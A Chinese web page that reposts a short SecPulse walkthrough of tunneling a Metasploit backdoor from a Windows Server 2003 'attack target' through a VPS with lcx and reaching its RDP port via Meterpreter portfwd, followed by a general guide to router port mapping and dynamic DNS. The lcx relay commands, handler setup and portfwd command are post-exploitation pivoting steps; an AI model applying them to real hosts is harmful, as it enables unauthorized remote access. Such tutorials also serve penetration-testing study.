porttunnel 使用 Msf 和 lcx 进行 Port Tunnel

使用 Msf 和 lcx 进行 Port Tunnel

本文《使用 Msf 和 lcx 进行 Port Tunnel》由armyzer0团队原创投稿安全脉搏，安全脉搏独家发表本文，如需要转载，请先联系安全脉搏授权；未经授权请勿转载。

使用 Msf 和 lcx 进行 Port Tunnel

连接示意图

VPS 服务器上用 lcx 工具进行端口监听

lcx -listen 5353 3535

Attack Target (Windows Server 2003) 服务器上运行 Msf后门并用 lcx 工具进行端口转发

Windows Server 2003 网络配置

运行 Msf 后门程序

运行 lcx 工具链接 VPS 服务器进行本地端口转发

lcx -slave 172.87.24.247 5353 127.0.0.1 9009

(VPS 上可看到来自 Attack Target 的网络连接)

BackBox 上启动 msfconsole 进行后门链接

Backbox 网络配置

启动 msfconsole 加载 exploit/multi/handler

Msf 终端下执行 run 命令启动链接

Meterpreter 内网端口转发

Portfwd命令简单端口转发（本地 3389 远程桌面转发）

Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt> The local host to listen on (optional).

-h Help banner.

-l <opt> The local port to listen on.

-p <opt> The remote port to connect to.

-r <opt> The remote host to connect to.

-L 选项指定本地监听的主机（即 Backbox 主机，可简单指定为:0.0.0.0）

-l 选项指定本地监听的端口（即 Backbox 主机监听的端口，可简单指定为：3389）

-p 选项指定远程主机要转发的端口（例如 Attack Target（Windows Server 2003）上的 3389 端口）

-r 选项制定远程主机网络地址（例如 Attack Target(Windows Server 2003) 的 127.0.0.1）

转发远程主机 3389 进行远程桌面链接

Portfwd add -L 0.0.0.0 -l 3389 -r 127.0.0.1 -p 3389

连接 Backbox 主机的 3389 端口

行文至末，属于比较详细的图文记录档案，可作为参考备用，欢迎不断查阅。

【安全脉搏：分享技术、悦享品质。文章仅代表作者看法，如有不同观点，欢迎添加安全脉搏微信号：SecPulse，进行交流。】

从外网访问局域网内的主机的方法

首先要做的事情如下：

1、确认你内网的路由器是否支持端口映射功能

2、如果你的路由器支持端口映射功能，在你本机安装远程控制软件

3、远程控制软件安装后，设置路由器，输入远程控制软件的端口和你本机ip，做端口映射

4、在你本机安装花生壳之类的动态域名软件

5、测试成功后，你在外网打开远程软件控制端，输入动态域名就可以访问你自己电脑了

端口映射（Port Mapping）：

如果你是ADSL、MODEM或光纤等宽带接入用户，想在公司或单位内部建一个服务器或WEB站点，并且想让互联网上的用户访问你的服务器，那么你就会遇到端口映射问题。

通常情况下，路由器都有防火墙功能，互联网用户只能访问到你的路由器WAN口(接ADSL的电话线口或路由宽带外网口)，而访问不到内部服务器。要想让互联网用户访问到你建的服务器，就要在路由器上做一个转发设置，也就是端口映射设置，让互联网用户发送的请求到达路由器后,再转发到你建立的服务器或WEB站点。这就是端口映射。由于各个路由器厂商所取功能名称不一样，有的叫虚拟服务器，有的叫NAT设置(BitComet中常见问题)端口映射。

其实做端口映射设置很简单，例如要映射一台内网IP地址为192.168.0.66的WEB服务器，只需把WEB服务器的IP地址192.168.0.66和TCP端口80填入到路由器的端口映射表中就OK了。

关于打开端口映射后的安全问题：

设置了端口映射后，互联网用户能够通过设置好映射的端口，跳过路由器防火墙访问到你的服务器，在通过攻击你服务器上的漏洞控制你的主机，所以打开端口映射后有必要在你的服务器上再挂一个防火墙也确保安全性。

花生壳是一套完全免费的动态域名解析服务客户端软件。当您安装并注册该项服务，无论您在任何地点、任何时间、使用任何线路，均可利用这一服务建立拥有固定域名和最大自主权的互联网主机。“花生壳”支持的线路包括普通电话线、ISDN、ADSL、有线电视网络、双绞线到户的宽带网和其它任何能够提供互联网真实IP的接入服务线路，而无论连接获得的IP属于动态还是静态。

动态域名

用户每次上网得到新的动态分配的IP地址之后，安装在用户计算机里的动态域名软件就会把这个IP地址发送到动态域名解析服务器，更新域名解析数据库。Internet上的其他人要访问这个域名的时候，动态域名解析服务器会返回正确的IP地址给他。这叫动态域名。

因为绝大部分Internet用户上网的时候分配到的IP地址都是动态的，用传统的静态域名解析方法，用户想把自己上网的计算机做成一个有固定域名的网站，是不可能的。而有了动态域名，这个美梦就可以成真。用户可以申请一个域名，利用动态域名解析服务，把域名与自己上网的计算机绑定在一起，这样就可以在家里或公司里搭建自己的网站，非常方便

端口映射（Port Mapping/Port Forwarding）有点类似服务重定向, 所以有些路由器(Router)中也称为虚拟服务器(Virtual Server)。为了描述方便, 下面的叙述中统一称为[端口映射]。采用端口映射的方法，可以实现从Internet 到局域网内部机器的特定端口服务的访问。

端口映射的实现方式可以分为纯软件和软硬结合方式。以纯软件方式实现端口映射功能软件有很多, 比如, MS Windows9x/200/XP 下的PortTunnel 专门针对HTTP、FTP、SMTP 服务的端口映射，提供了较多的参数设置，在相应的标签菜单下调整。又如各种版本的Linux 操作系统本身就支持端口映射, 只需要网络管理员做相应的设置和调整即可实现。而以软硬结合方式实现端口映射功能的, 主要常见于各种路由器(提供网关路由功能) 。

下面主要介绍各种路由器(Router)中如何实现端口映射

一般路由器中有个端口映射（Port Mapping）或者虚拟服务器(Virtual Server)的设置。用户需要在路由器(Router)的“管理界面”中相应的端口映射界面中, 设置好相应的需要映射的端口, 协议,内网地址等, 才能生效。设置的方法可能会因为路由器(Router)不同的品牌和型号，在设置的方法上也会有所不同。端口映射支持的网络协议有TCP/UDP/两者, 所以进行端口映射设置时, 如果不熟悉, 可以选择两者都支持。

举例说明:

以某路由器(Router)为例，在启用其路由功能之后，网络拓扑图如下：

这里假定路由器(Router)默认IP 内网地址为192.168.1.1，内网中电脑一般可以设置成为192.168.1.X（X=2~254），在内网中某一台电脑上打开IE，在地址栏输入http://192.168.1.1，输入初始用户名、密码，之后就可以看到设置界面了。

针对邮件服务器要做如下设置：进入“端口映射”，在端口填入 25, 协议中选择： TCP, IP地址： 192.168.1.x(x 为安装邮件服务器电脑的局域网IP 地址），同样方法设置110(pop3),6080(webmail)端口等。以上假定用户内网段地址为: 192.168.1.0。设置好后, 就实现了端口映射功能了, 发往路由器的邮件就会自动转发到指定的内网主机上(192.168.1.x)。

同样, 如果想设置特殊端口, 比如: 6000。在端口填入 6000, 协议中选择： ALL(或根据具体情况选择), IP 地址：192.168.1.x(x 为内网段地址 1~254)。设置好后, 发往路由器6000 端口的任何数据就会自动转发到主机192.168.1.x 的端口6000 上了。

以上说明没有针对具体路由器。具体情况, 请查阅您的路由器说明书，看看如何作端口映射。

porttunnel 使用 Msf 和 lcx 进行 Port Tunnel

分类：软件分类日期：2025-01-23 浏览：23 评论：0

使用 Msf 和 lcx 进行 Port Tunnel

从外网访问局域网内的主机的方法

相关推荐

porttunnel 使用 Msf 和 lcx 进行 Port Tunnel

分类：软件分类 日期：2025-01-23 浏览：23 评论：0

使用 Msf 和 lcx 进行 Port Tunnel

从外网访问局域网内的主机的方法

相关推荐

分类：软件分类日期：2025-01-23 浏览：23 评论：0